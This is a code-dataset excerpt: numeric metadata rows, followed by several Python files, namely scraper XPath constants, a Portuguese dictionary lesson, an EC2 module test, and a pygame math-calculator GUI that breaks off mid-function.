| 0.4375
| 0.531469
| 0.524476
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.106509
| 169
| 4
| 48
| 42.25
| 0.94702
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
2a2bbd2e5267fb8bd8a0a8fc5a518955cd4f6060
| 478
|
py
|
Python
|
src/constants.py
|
matheus3301/neps-academy-scraper
|
cc8608b252a139354ef288db1c6318aaebec8842
|
[
"MIT"
] | null | null | null |
src/constants.py
|
matheus3301/neps-academy-scraper
|
cc8608b252a139354ef288db1c6318aaebec8842
|
[
"MIT"
] | null | null | null |
src/constants.py
|
matheus3301/neps-academy-scraper
|
cc8608b252a139354ef288db1c6318aaebec8842
|
[
"MIT"
] | null | null | null |
NEPS_URL = 'https://neps.academy'
ENGLISH_BUTTON = '/html/body/div/div/div/div[2]/div/div/a/div[2]/div'
LOGIN_PAGE_BUTTON = '//*[@id="app"]/div/div/div/div[1]/div/header/div/div/div[3]/div/div/nav/ul/li[6]/button'
EMAIL_INPUT = '/html/body/div/div/div/div[3]/div/div/div/form/div[1]/div/div[1]/div/input'
PASSWORD_INPUT = '/html/body/div/div/div/div[3]/div/div/div/form/div[2]/div/div[1]/div[1]/input'
LOGIN_MODAL_BUTTON = '//*[@id="app"]/div[3]/div/div/div/form/div[3]/button'
| 68.285714
| 109
| 0.688285
| 98
| 478
| 3.27551
| 0.27551
| 0.448598
| 0.336449
| 0.149533
| 0.436137
| 0.436137
| 0.323988
| 0.261682
| 0.261682
| 0.261682
| 0
| 0.030435
| 0.037657
| 478
| 6
| 110
| 79.666667
| 0.667391
| 0
| 0
| 0
| 0
| 0.833333
| 0.753138
| 0.711297
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.166667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
2a81e9ddfb7ac78ff0f33d61525c7d598ea086a2
| 1,285
|
py
|
Python
|
Aula/aula019_II_dicionarios.py
|
HenriqueSOliver/Python_CursoEmVideo
|
6a8ab0c0fa3443990fc0bbbd817314065cf4e01b
|
[
"MIT"
] | 1
|
2021-04-08T19:54:01.000Z
|
2021-04-08T19:54:01.000Z
|
Python (3)/Aula/aula019_II_dicionarios.py
|
Gafanhoto742/Python-3
|
b0a13ec4cf60185af3ed2508fc69188e36415b80
|
[
"MIT"
] | null | null | null |
Python (3)/Aula/aula019_II_dicionarios.py
|
Gafanhoto742/Python-3
|
b0a13ec4cf60185af3ed2508fc69188e36415b80
|
[
"MIT"
] | null | null | null |
# como adicionar itens em dicionario + lista em um looping + formatação
estado = {} # {} = dicionário
brasil = [] # [] lista
for c in range (0,3):
estado['uf']= str(input('Unidade Federativa: '))
estado['Sigla']=str(input('Sigla do Estado: '))
brasil.append(estado.copy()) # quando temos esse misto de dicionário e lista temos que inserir o copy para o dicionário, não podemos fatiar igual lista
for e in brasil:
print(e)
estado = {} # {} = dicionário
brasil = [] # [] lista
for c in range (0,2):
estado['uf']= str(input('Unidade Federativa: '))
estado['Sigla']=str(input('Sigla do Estado: '))
brasil.append(estado.copy()) # quando temos esse misto de dicionário e lista temos que inserir o copy para o dicionário, não podemos fatiar igual lista
for e in brasil:
for k, v in e.items():
print(f'O campo {k} tem o valor {v}')
estado = {} # {} = dicionário
brasil = [] # [] lista
for c in range (0,2):
estado['uf']= str(input('Unidade Federativa: '))
estado['Sigla']=str(input('Sigla do Estado: '))
brasil.append(estado.copy()) # quando temos esse misto de dicionário e lista temos que inserir o copy para o dicionário, não podemos fatiar igual lista
for e in brasil:
for v in e.valeus():
print(v, end=' ')
print ( )
| 40.15625
| 155
| 0.652918
| 192
| 1,285
| 4.369792
| 0.270833
| 0.057211
| 0.078665
| 0.096544
| 0.856973
| 0.856973
| 0.856973
| 0.856973
| 0.856973
| 0.810489
| 0
| 0.005888
| 0.207004
| 1,285
| 32
| 156
| 40.15625
| 0.817468
| 0.394553
| 0
| 0.740741
| 0
| 0
| 0.208333
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.148148
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
2ad3e41cb346f27624ded3ecff1e49303bc8c52e
| 349
|
py
|
Python
|
tests/internal/instance_type/test_instance_type_vt_auto.py
|
frolovv/aws.ec2.compare
|
582805823492f833d65c0441c4a14dce697c12aa
|
[
"Apache-2.0"
] | null | null | null |
tests/internal/instance_type/test_instance_type_vt_auto.py
|
frolovv/aws.ec2.compare
|
582805823492f833d65c0441c4a14dce697c12aa
|
[
"Apache-2.0"
] | null | null | null |
tests/internal/instance_type/test_instance_type_vt_auto.py
|
frolovv/aws.ec2.compare
|
582805823492f833d65c0441c4a14dce697c12aa
|
[
"Apache-2.0"
] | null | null | null |
# Testing module instance_type.vt
import pytest
import ec2_compare.internal.instance_type.vt
def test_get_internal_data_instance_type_vt_get_instances_list():
assert len(ec2_compare.internal.instance_type.vt.get_instances_list()) > 0
def test_get_internal_data_instance_type_vt_get():
assert len(ec2_compare.internal.instance_type.vt.get) > 0
| 34.9
| 76
| 0.848138
| 56
| 349
| 4.839286
| 0.339286
| 0.265683
| 0.309963
| 0.250923
| 0.826568
| 0.826568
| 0.612546
| 0.612546
| 0.612546
| 0
| 0
| 0.01548
| 0.074499
| 349
| 9
| 77
| 38.777778
| 0.823529
| 0.088825
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.333333
| 1
| 0.333333
| true
| 0
| 0.333333
| 0
| 0.666667
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 10
|
2aea3281e6f47b5f3ba0cc7ffa55f0e7eeaa12b3
| 125,925
|
py
|
Python
|
MathStuff_GUI.py
|
ShadowGamer35/Math-Stuff
|
de20a03ef6c09b26229e5f7fe4b9a6b1f7f21d61
|
[
"MIT"
] | null | null | null |
MathStuff_GUI.py
|
ShadowGamer35/Math-Stuff
|
de20a03ef6c09b26229e5f7fe4b9a6b1f7f21d61
|
[
"MIT"
] | null | null | null |
MathStuff_GUI.py
|
ShadowGamer35/Math-Stuff
|
de20a03ef6c09b26229e5f7fe4b9a6b1f7f21d61
|
[
"MIT"
] | null | null | null |
from sys import exit
import pygame
import MathStuff as MATH
import GUICreator
StaticButton = GUICreator.StaticButton
DynamicButton = GUICreator.DynamicButton
StaticTextButton = GUICreator.StaticTextButton
DynamicTextButton = GUICreator.DynamicTextButton
class MathStuffGUI:
"""Create a GUI for my calculators."""
def __init__(self):
"""Initialize variables."""
pygame.init()
self.manage_fps = pygame.time.Clock()
self.FPS = 30
# Initialize the screen.
display_info = pygame.display.Info()
max_width = display_info.current_w
max_height = display_info.current_h
display_ratio = max_width/max_height
if display_ratio <= 16/9:
x = int(max_width * 0.8)
y = int(max_width/(16/9) * 0.8)
else:
x = int(max_height*(16/9) * 0.8)
y = int(max_height * 0.8)
self.screen = pygame.display.set_mode((x, y), pygame.RESIZABLE)
pygame.display.set_caption("Math Stuff")
self.screen_rect = self.screen.get_rect()
self.create_all_gui()
self.universal_menu_variables()
def run_program(self):
"""Run the program."""
while True:
self.manage_fps.tick(self.FPS)
self.get_events()
self.update_screen()
def universal_menu_variables(self):
"""Create flags for the menus."""
self.active_menu = 'main_menu'
self.active_button = ''
self.input_box_1 = ''
self.input_box_2 = ''
self.input_box_3 = ''
self.input_box_4 = ''
self.input_box_5 = ''
self.input_box_6 = ''
self.input_box_7 = ''
self.input_box_1_mod = ''
self.input_box_2_mod = ''
self.input_box_3_mod = ''
self.input_box_4_mod = ''
self.input_box_5_mod = ''
self.input_box_6_mod = ''
self.input_box_7_mod = ''
self.input_value_1 = 0
self.input_value_2 = 0
self.input_value_3 = 0
self.input_value_4 = 0
self.input_value_5 = 0
self.input_value_6 = 0
self.input_value_7 = 0
self.answer = ''
self.answer_text_x_mod = 0
self.hover_text = ''
self.input_buttons = 0
def reset_variables(self, menu):
"""Reset the variables and change the active menu."""
self.active_button = ''
self.active_menu = menu
self.answer = ''
self.input_box_1 = ''
self.input_box_2 = ''
self.input_box_3 = ''
self.input_box_4 = ''
self.input_box_5 = ''
self.input_box_6 = ''
self.input_box_7 = ''
self.input_box_1_mod = ''
self.input_box_2_mod = ''
self.input_box_3_mod = ''
self.input_box_4_mod = ''
self.input_box_5_mod = ''
self.input_box_6_mod = ''
self.input_box_7_mod = ''
self.input_value_1 = 0
self.input_value_2 = 0
self.input_value_3 = 0
self.input_value_4 = 0
self.input_value_5 = 0
self.input_value_6 = 0
self.input_value_7 = 0
self.answer_text_x_mod = 0
def event_check_number(self, event):
"""Check that the key that was pressed is valid for a number."""
if (event.unicode == '1'
or event.unicode == '2'
or event.unicode == '3'
or event.unicode == '4'
or event.unicode == '5'
or event.unicode == '6'
or event.unicode == '7'
or event.unicode == '8'
or event.unicode == '9'
or event.unicode == '0'
or event.unicode == '.'
or event.unicode == '-'):
return True
else:
return False
def event_check_letter(self, event):
"""Check that the key that was pressed is a letter."""
if (event.unicode == 'a'
or event.unicode == 'b'
or event.unicode == 'c'
or event.unicode == 'd'
or event.unicode == 'e'
or event.unicode == 'f'
or event.unicode == 'g'
or event.unicode == 'h'
or event.unicode == 'i'
or event.unicode == 'j'
or event.unicode == 'k'
or event.unicode == 'l'
or event.unicode == 'm'
or event.unicode == 'n'
or event.unicode == 'o'
or event.unicode == 'p'
or event.unicode == 'q'
or event.unicode == 'r'
or event.unicode == 's'
or event.unicode == 't'
or event.unicode == 'u'
or event.unicode == 'v'
or event.unicode == 'w'
or event.unicode == 'x'
or event.unicode == 'y'
or event.unicode == 'z'
or event.unicode == 'A'
or event.unicode == 'B'
or event.unicode == 'C'
or event.unicode == 'D'
or event.unicode == 'E'
or event.unicode == 'F'
or event.unicode == 'G'
or event.unicode == 'H'
or event.unicode == 'I'
or event.unicode == 'J'
or event.unicode == 'K'
or event.unicode == 'L'
or event.unicode == 'M'
or event.unicode == 'N'
or event.unicode == 'O'
or event.unicode == 'P'
or event.unicode == 'Q'
or event.unicode == 'R'
or event.unicode == 'S'
or event.unicode == 'T'
or event.unicode == 'U'
or event.unicode == 'V'
or event.unicode == 'W'
or event.unicode == 'X'
or event.unicode == 'Y'
or event.unicode == 'Z'):
return True
else:
return False
# Event handling.
def get_events(self):
"""Get pygame events."""
for event in pygame.event.get():
if event.type == pygame.QUIT:
exit()
elif event.type == pygame.VIDEORESIZE:
self.screen_rect = self.screen.get_rect()
self.create_all_gui()
elif event.type == pygame.KEYDOWN:
self.manage_keydown(event)
elif event.type == pygame.KEYUP:
self.manage_keyup(event)
elif event.type == pygame.MOUSEBUTTONDOWN:
self.manage_mousebuttondown(event)
elif event.type == pygame.MOUSEBUTTONUP:
self.manage_mousebuttonup(event)
elif event.type == pygame.MOUSEMOTION:
self.manage_mousemotion(event)
def manage_mousemotion(self, event):
mouse_pos = pygame.mouse.get_pos()
if (self.active_menu != 'main_menu'
and self.active_menu != 'factors_menu'
and self.active_menu != 'converters_menu'
and self.active_menu != 'geometry_menu'
and self.active_menu != 'algebra_menu'
and self.active_menu != 'data_processing_menu'):
if self.answer_button.button.collidepoint(mouse_pos):
self.hover_text = 'Scroll to move the text left and right.'
elif self.calculate_button.button.collidepoint(mouse_pos):
self.hover_text = 'Click to calculate answer, or press the enter key.'
elif self.back_button.button.collidepoint(mouse_pos):
self.hover_text = 'Return to previous menu.'
elif self.hover_text_help.button.collidepoint(mouse_pos):
self.hover_text = 'Do I need to explain everything?'
else:
self.hover_text = 'Hover cursor over a button for help.'
# Get factors menu.
if self.active_menu == 'get_factors_menu':
if self.input_button_4.button.collidepoint(mouse_pos):
self.hover_text = 'Enter the number you want to factor.'
# Maintain ratio menu.
elif self.active_menu == 'mar_menu':
if self.input_button_1.button.collidepoint(mouse_pos):
self.hover_text = 'Width of source surface.'
elif self.input_button_3.button.collidepoint(mouse_pos):
self.hover_text = 'Height of source surface.'
elif self.input_button_5.button.collidepoint(mouse_pos):
self.hover_text = 'Width of destination surface.'
elif self.input_button_7.button.collidepoint(mouse_pos):
self.hover_text = 'Height of destination surface.'
# Solid polygon menu.
elif self.active_menu == 'solid_polygon_menu':
if self.input_button_4.button.collidepoint(mouse_pos):
self.hover_text = 'Enter the number of sides of a base.'
# Temperature convert menu.
elif self.active_menu == 'temp_menu':
if self.input_button_2.button.collidepoint(mouse_pos):
self.hover_text = 'Original temperature.'
elif self.input_button_4.button.collidepoint(mouse_pos):
self.hover_text = 'Current temperature scale (F, C, K).'
elif self.input_button_6.button.collidepoint(mouse_pos):
self.hover_text = 'Temperature scale to convert to (F, C, K).'
# Root menu.
elif self.active_menu == 'root_menu':
if self.input_button_3.button.collidepoint(mouse_pos):
self.hover_text = 'Radicand.'
elif self.input_button_5.button.collidepoint(mouse_pos):
self.hover_text = 'Index.'
# Extrapolate menu.
elif self.active_menu == 'extrapolate_menu':
if self.input_button_1.button.collidepoint(mouse_pos):
self.hover_text = 'Start number.'
if self.input_button_3.button.collidepoint(mouse_pos):
self.hover_text = 'Modifier.'
if self.input_button_5.button.collidepoint(mouse_pos):
self.hover_text = 'Operation (Add, subtract, multiply, divide, exponent, root).'
if self.input_button_7.button.collidepoint(mouse_pos):
self.hover_text = 'Number of values from the start number to return.'
# Other menus.
elif (self.active_menu == 'common_factors_menu'
or self.active_menu == 'gcf_menu'
or self.active_menu == 'lcf_menu'
or self.active_menu == 'average_menu'
or self.active_menu == 'median_menu'
or self.active_menu == 'mode_menu'
or self.active_menu == 'range_menu'):
if self.input_button_1.button.collidepoint(mouse_pos):
self.hover_text = "First number (You don't need to use all four)."
if self.input_button_3.button.collidepoint(mouse_pos):
self.hover_text = "Second number (You don't need to use all four)."
if self.input_button_5.button.collidepoint(mouse_pos):
self.hover_text = "Third number (You don't need to use all four)."
if self.input_button_7.button.collidepoint(mouse_pos):
self.hover_text = "Fourth number (You don't need to use all four)."
def manage_keydown(self, event):
"""Manage pygame KEYDOWN events."""
if event.key == pygame.K_ESCAPE:
exit()
# Get factors input menu.
elif self.active_menu == 'get_factors_input_1':
if event.key == pygame.K_RETURN:
if self.input_box_4 != '':
self.input_value_4 = int(self.input_box_4)
self.answer = str(MATH.get_factors_(self.input_value_4))
self.answer_text_x_mod = 0
self.active_button = ''
self.active_menu = 'get_factors_menu'
elif event.key == pygame.K_BACKSPACE:
self.input_box_4 = self.input_box_4[:-1]
elif len(self.input_box_4) >= 7:
None
elif self.event_check_number(event):
if (event.unicode == '-'
or event.unicode == '.'):
None
else:
self.input_box_4 += event.unicode
# Common factors input menu.
elif (self.active_menu == 'common_factors_input_1'
or self.active_menu == 'common_factors_input_2'
or self.active_menu == 'common_factors_input_3'
or self.active_menu == 'common_factors_input_4'):
if event.key == pygame.K_RETURN:
value_list = []
if self.input_box_1 != '':
self.input_value_1 = int(self.input_box_1)
value_list.append(self.input_value_1)
if self.input_box_3 != '':
self.input_value_3 = int(self.input_box_3)
value_list.append(self.input_value_3)
if self.input_box_5 != '':
self.input_value_5 = int(self.input_box_5)
value_list.append(self.input_value_5)
if self.input_box_7 != '':
self.input_value_7 = int(self.input_box_7)
value_list.append(self.input_value_7)
if value_list != []:
self.answer = str(MATH.common_factors_(value_list))
self.answer_text_x_mod = 0
self.active_menu = 'common_factors_menu'
self.active_button = ''
if self.active_menu == 'common_factors_input_1':
if event.key == pygame.K_BACKSPACE:
self.input_box_1 = self.input_box_1[:-1]
elif len(self.input_box_1) >= 7:
None
elif self.event_check_number(event):
if (event.unicode == '-'
or event.unicode == '.'):
None
else:
self.input_box_1 += event.unicode
elif self.active_menu == 'common_factors_input_2':
if event.key == pygame.K_BACKSPACE:
self.input_box_3 = self.input_box_3[:-1]
elif len(self.input_box_3) >= 7:
None
elif self.event_check_number(event):
if (event.unicode == '-'
or event.unicode == '.'):
None
else:
self.input_box_3 += event.unicode
elif self.active_menu == 'common_factors_input_3':
if event.key == pygame.K_BACKSPACE:
self.input_box_5 = self.input_box_5[:-1]
elif len(self.input_box_5) >= 7:
None
elif self.event_check_number(event):
if (event.unicode == '-'
or event.unicode == '.'):
None
else:
self.input_box_5 += event.unicode
elif self.active_menu == 'common_factors_input_4':
if event.key == pygame.K_BACKSPACE:
self.input_box_7 = self.input_box_7[:-1]
elif len(self.input_box_7) >= 7:
None
elif self.event_check_number(event):
if (event.unicode == '-'
or event.unicode == '.'):
None
else:
self.input_box_7 += event.unicode
# Greatest common factors input menu.
elif (self.active_menu == 'gcf_input_1'
or self.active_menu == 'gcf_input_2'
or self.active_menu == 'gcf_input_3'
or self.active_menu == 'gcf_input_4'):
if event.key == pygame.K_RETURN:
value_list = []
if self.input_box_1 != '':
self.input_value_1 = int(self.input_box_1)
value_list.append(self.input_value_1)
if self.input_box_3 != '':
self.input_value_3 = int(self.input_box_3)
value_list.append(self.input_value_3)
if self.input_box_5 != '':
self.input_value_5 = int(self.input_box_5)
value_list.append(self.input_value_5)
if self.input_box_7 != '':
self.input_value_7 = int(self.input_box_7)
value_list.append(self.input_value_7)
if value_list != []:
self.answer = str(MATH.gcf_(value_list))
self.answer_text_x_mod = 0
self.active_menu = 'gcf_menu'
self.active_button = ''
if self.active_menu == 'gcf_input_1':
if event.key == pygame.K_BACKSPACE:
self.input_box_1 = self.input_box_1[:-1]
elif len(self.input_box_1) >= 7:
None
elif self.event_check_number(event):
if (event.unicode == '-'
or event.unicode == '.'):
None
else:
self.input_box_1 += event.unicode
elif self.active_menu == 'gcf_input_2':
if event.key == pygame.K_BACKSPACE:
self.input_box_3 = self.input_box_3[:-1]
elif len(self.input_box_3) >= 7:
None
elif self.event_check_number(event):
if (event.unicode == '-'
or event.unicode == '.'):
None
else:
self.input_box_3 += event.unicode
elif self.active_menu == 'gcf_input_3':
if event.key == pygame.K_BACKSPACE:
self.input_box_5 = self.input_box_5[:-1]
elif len(self.input_box_5) >= 7:
None
elif self.event_check_number(event):
if (event.unicode == '-'
or event.unicode == '.'):
None
else:
self.input_box_5 += event.unicode
elif self.active_menu == 'gcf_input_4':
if event.key == pygame.K_BACKSPACE:
self.input_box_7 = self.input_box_7[:-1]
elif len(self.input_box_7) >= 7:
None
elif self.event_check_number(event):
if (event.unicode == '-'
or event.unicode == '.'):
None
else:
self.input_box_7 += event.unicode
# Least common factors input menu.
elif (self.active_menu == 'lcf_input_1'
or self.active_menu == 'lcf_input_2'
or self.active_menu == 'lcf_input_3'
or self.active_menu == 'lcf_input_4'):
if event.key == pygame.K_RETURN:
value_list = []
if self.input_box_1 != '':
self.input_value_1 = int(self.input_box_1)
value_list.append(self.input_value_1)
if self.input_box_3 != '':
self.input_value_3 = int(self.input_box_3)
value_list.append(self.input_value_3)
if self.input_box_5 != '':
self.input_value_5 = int(self.input_box_5)
value_list.append(self.input_value_5)
if self.input_box_7 != '':
self.input_value_7 = int(self.input_box_7)
value_list.append(self.input_value_7)
if value_list != []:
self.answer = str(MATH.lcf_(value_list))
self.answer_text_x_mod = 0
self.active_menu = 'lcf_menu'
self.active_button = ''
if self.active_menu == 'lcf_input_1':
if event.key == pygame.K_BACKSPACE:
self.input_box_1 = self.input_box_1[:-1]
elif len(self.input_box_1) >= 7:
None
elif self.event_check_number(event):
if (event.unicode == '-'
or event.unicode == '.'):
None
else:
self.input_box_1 += event.unicode
elif self.active_menu == 'lcf_input_2':
if event.key == pygame.K_BACKSPACE:
self.input_box_3 = self.input_box_3[:-1]
elif len(self.input_box_3) >= 7:
None
elif self.event_check_number(event):
if (event.unicode == '-'
or event.unicode == '.'):
None
else:
self.input_box_3 += event.unicode
elif self.active_menu == 'lcf_input_3':
if event.key == pygame.K_BACKSPACE:
self.input_box_5 = self.input_box_5[:-1]
elif len(self.input_box_5) >= 7:
None
elif self.event_check_number(event):
if (event.unicode == '-'
or event.unicode == '.'):
None
else:
self.input_box_5 += event.unicode
elif self.active_menu == 'lcf_input_4':
if event.key == pygame.K_BACKSPACE:
self.input_box_7 = self.input_box_7[:-1]
elif len(self.input_box_7) >= 7:
None
elif self.event_check_number(event):
if (event.unicode == '-'
or event.unicode == '.'):
None
else:
self.input_box_7 += event.unicode
# Maintain ratio input menu.
elif (self.active_menu == 'mar_input_1'
or self.active_menu == 'mar_input_2'
or self.active_menu == 'mar_input_3'
or self.active_menu == 'mar_input_4'):
if event.key == pygame.K_RETURN:
if (self.input_box_1 == ''
or self.input_box_3 == ''
or self.input_box_5 == ''
or self.input_box_7 == ''):
None
else:
self.input_value_1 = float(self.input_box_1)
self.input_value_3 = float(self.input_box_3)
self.input_value_5 = float(self.input_box_5)
self.input_value_7 = float(self.input_box_7)
source_surf = [self.input_value_1, self.input_value_3]
dest_surf = [self.input_value_5, self.input_value_7]
try:
self.answer = str(MATH.maintain_aspect_ratio_(
source_surf, dest_surf))
except ZeroDivisionError:
pass
self.answer_text_x_mod = 0
self.active_button = ''
self.active_menu = 'mar_menu'
if self.active_menu == 'mar_input_1':
if event.key == pygame.K_BACKSPACE:
self.input_box_1 = self.input_box_1[:-1]
self.input_box_1_mod = self.input_box_1
elif len(self.input_box_1_mod) >= 7:
None
elif self.event_check_number(event):
if event.unicode == '-':
None
else:
self.input_box_1 += event.unicode
self.input_box_1_mod = self.input_box_1
if '.' in self.input_box_1_mod:
self.input_box_1_mod = self.input_box_1_mod.replace('.', '')
elif self.active_menu == 'mar_input_2':
if event.key == pygame.K_BACKSPACE:
self.input_box_3 = self.input_box_3[:-1]
self.input_box_3_mod = self.input_box_3
elif len(self.input_box_3_mod) >= 7:
None
elif self.event_check_number(event):
if event.unicode == '-':
None
else:
self.input_box_3 += event.unicode
self.input_box_3_mod = self.input_box_3
if '.' in self.input_box_3_mod:
self.input_box_3_mod = self.input_box_3_mod.replace('.', '')
elif self.active_menu == 'mar_input_3':
if event.key == pygame.K_BACKSPACE:
self.input_box_5 = self.input_box_5[:-1]
self.input_box_5_mod = self.input_box_5
elif len(self.input_box_5_mod) >= 7:
None
elif self.event_check_number(event):
if event.unicode == '-':
None
else:
self.input_box_5 += event.unicode
self.input_box_5_mod = self.input_box_5
if '.' in self.input_box_5_mod:
self.input_box_5_mod = self.input_box_5_mod.replace('.', '')
elif self.active_menu == 'mar_input_4':
if event.key == pygame.K_BACKSPACE:
self.input_box_7 = self.input_box_7[:-1]
self.input_box_7_mod = self.input_box_7
elif len(self.input_box_7_mod) >= 7:
None
elif self.event_check_number(event):
if event.unicode == '-':
None
else:
self.input_box_7 += event.unicode
self.input_box_7_mod = self.input_box_7
if '.' in self.input_box_7_mod:
self.input_box_7_mod = self.input_box_7_mod.replace('.', '')
# Solid polygon input menu.
elif self.active_menu == 'solid_polygon_input_1':
if event.key == pygame.K_RETURN:
if self.input_box_4 != '':
self.input_value_4 = int(self.input_box_4)
self.answer = MATH.solid_polygon_info_(self.input_value_4)
self.answer = f'Edges = {self.answer["edges"]}, Vertices = {self.answer["vertices"]}, Faces = {self.answer["faces"]}, Triangles = {self.answer["triangles"]}'
self.answer_text_x_mod = 0
self.active_button = ''
self.active_menu = 'solid_polygon_menu'
elif event.key == pygame.K_BACKSPACE:
self.input_box_4 = self.input_box_4[:-1]
elif len(self.input_box_4) >= 7:
None
elif self.event_check_number(event):
if event.unicode == '-' or event.unicode == '.':
None
else:
self.input_box_4 += event.unicode
# Temperature convert menu.
elif (self.active_menu == 'temp_input_1'
or self.active_menu == 'temp_input_2'
or self.active_menu == 'temp_input_3'):
if event.key == pygame.K_RETURN:
if (self.input_box_2 == ''
or self.input_box_4 == ''
or self.input_box_6 == ''):
None
else:
self.input_value_2 = float(self.input_box_2)
self.input_value_4 = self.input_box_4.upper()
self.input_value_6 = self.input_box_6.upper()
self.answer = str(MATH.temperature_convert_(self.input_value_2, self.input_value_4, self.input_value_6))
self.answer_text_x_mod = 0
self.active_button = ''
self.active_menu = 'temp_menu'
if self.active_menu == 'temp_input_1':
if event.key == pygame.K_BACKSPACE:
self.input_box_2 = self.input_box_2[:-1]
self.input_box_2_mod = self.input_box_2
if '-' in self.input_box_2_mod:
self.input_box_2_mod = self.input_box_2_mod.replace('-', '')
if '.' in self.input_box_2_mod:
self.input_box_2_mod = self.input_box_2_mod.replace('.', '')
elif len(self.input_box_2_mod) >= 7:
None
elif self.event_check_number(event):
if (event.unicode == '-' and '-' in self.input_box_2
or event.unicode == '.' and '.' in self.input_box_2):
None
else:
self.input_box_2 += event.unicode
self.input_box_2_mod = self.input_box_2
if '-' in self.input_box_2_mod:
self.input_box_2_mod = self.input_box_2_mod.replace('-', '')
if '.' in self.input_box_2_mod:
self.input_box_2_mod = self.input_box_2_mod.replace('.', '')
elif self.active_menu == 'temp_input_2':
if event.key == pygame.K_BACKSPACE:
self.input_box_4 = self.input_box_4[:-1]
elif len(self.input_box_4) >= 1:
None
elif self.event_check_letter(event):
if (event.unicode == 'F'
or event.unicode == 'f'
or event.unicode == 'C'
or event.unicode == 'c'
or event.unicode == 'K'
or event.unicode == 'k'):
self.input_box_4 += event.unicode
elif self.active_menu == 'temp_input_3':
if event.key == pygame.K_BACKSPACE:
self.input_box_6 = self.input_box_6[:-1]
elif len(self.input_box_6) >= 1:
None
elif self.event_check_letter(event):
if (event.unicode == 'F'
or event.unicode == 'f'
or event.unicode == 'C'
or event.unicode == 'c'
or event.unicode == 'K'
or event.unicode == 'k'):
self.input_box_6 += event.unicode
# Root menu.
elif (self.active_menu == 'root_input_1'
or self.active_menu == 'root_input_2'):
if event.key == pygame.K_RETURN:
if (self.input_box_3 == ''
or self.input_box_5 == ''):
None
else:
self.input_value_3 = float(self.input_box_3)
self.input_value_5 = float(self.input_box_5)
self.answer = str(MATH.root_(self.input_value_3, self.input_value_5))
self.answer_text_x_mod = 0
self.active_button = ''
self.active_menu = 'root_menu'
if self.active_menu == 'root_input_1':
if event.key == pygame.K_BACKSPACE:
self.input_box_3 = self.input_box_3[:-1]
self.input_box_3_mod = self.input_box_3
if '-' in self.input_box_3_mod:
self.input_box_3_mod = self.input_box_3_mod.replace('-', '')
if '.' in self.input_box_3_mod:
self.input_box_3_mod = self.input_box_3_mod.replace('.', '')
elif len(self.input_box_3_mod) >= 7:
None
elif self.event_check_number(event):
if (event.unicode == '-' and '-' in self.input_box_3
or event.unicode == '.' and '.' in self.input_box_3):
None
else:
self.input_box_3 += event.unicode
self.input_box_3_mod = self.input_box_3
if '-' in self.input_box_3_mod:
self.input_box_3_mod = self.input_box_3_mod.replace('-', '')
if '.' in self.input_box_3_mod:
self.input_box_3_mod = self.input_box_3_mod.replace('.', '')
if self.active_menu == 'root_input_2':
if event.key == pygame.K_BACKSPACE:
self.input_box_5 = self.input_box_5[:-1]
self.input_box_5_mod = self.input_box_5
if '-' in self.input_box_5_mod:
self.input_box_5_mod = self.input_box_5_mod.replace('-', '')
if '.' in self.input_box_5_mod:
self.input_box_5_mod = self.input_box_5_mod.replace('.', '')
elif len(self.input_box_5_mod) >= 7:
None
elif self.event_check_number(event):
if (event.unicode == '-' and '-' in self.input_box_5
or event.unicode == '.' and '.' in self.input_box_5):
None
else:
self.input_box_5 += event.unicode
self.input_box_5_mod = self.input_box_5
if '-' in self.input_box_5_mod:
self.input_box_5_mod = self.input_box_5_mod.replace('-', '')
if '.' in self.input_box_5_mod:
self.input_box_5_mod = self.input_box_5_mod.replace('.', '')
# Extrapolate menu.
elif (self.active_menu == 'extrapolate_input_1'
or self.active_menu == 'extrapolate_input_2'
or self.active_menu == 'extrapolate_input_3'
or self.active_menu == 'extrapolate_input_4'):
if event.key == pygame.K_RETURN:
check = ['add', 'subtract', 'multiply', 'divide', 'exponent', 'root']
if (self.input_box_1 == ''
or self.input_box_3 == ''
or self.input_box_5 == ''
or self.input_box_5.lower() not in check
or self.input_box_7 == ''):
None
else:
try:
self.input_value_1 = int(self.input_box_1)
self.input_value_3 = int(self.input_box_3)
except ValueError:
self.input_value_1 = float(self.input_box_1)
self.input_value_3 = float(self.input_box_3)
self.input_value_5 = self.input_box_5.lower()
self.input_value_7 = int(self.input_box_7)
self.answer = str(MATH.extrapolate_(self.input_value_1, self.input_value_3, self.input_value_5, self.input_value_7))
self.answer_text_x_mod = 0
self.active_button = ''
self.active_menu = 'extrapolate_menu'
if self.active_menu == 'extrapolate_input_1':
if event.key == pygame.K_BACKSPACE:
self.input_box_1 = self.input_box_1[:-1]
self.input_box_1_mod = self.input_box_1
if '-' in self.input_box_1_mod:
self.input_box_1_mod = self.input_box_1_mod.replace('-', '')
if '.' in self.input_box_1_mod:
self.input_box_1_mod = self.input_box_1_mod.replace('.', '')
